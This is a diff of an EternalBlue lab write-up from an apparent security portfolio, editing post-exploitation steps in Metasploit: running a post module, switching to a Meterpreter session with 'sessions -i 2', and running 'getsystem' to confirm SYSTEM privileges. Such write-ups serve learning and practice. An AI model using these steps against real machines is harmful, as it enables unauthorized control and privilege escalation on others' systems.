Mitsu-bis/security-portfolio/Eternal-Blue-Write-Up.md

      set SESSION 1

-Now we can run our post exploit using the "run" or "exploit" command. once the payoad has executed it will create it's own session.
+Now we can run our post exploit using the "run" or "exploit" command. once the payoad has executed it will create a new session names session 2.

 We have our Meterpreter session connected on the target machine now.

-Lets now switch to our elevated Meterpreter session with the command "sessions -i {session_id}"
+Lets now switch to our Meterpreter session with the command "sessions -i {session_id}" or "sessions {session_id}"

     sessions -i 2
+or
+	sessions 2

- Start by verifying that we have esclated to NT Authority/System.
+ Once your inside the session start by verifying that we have esclated to NT Authority/System.
 Run the "getsystem" command to confirm this.

     getsystem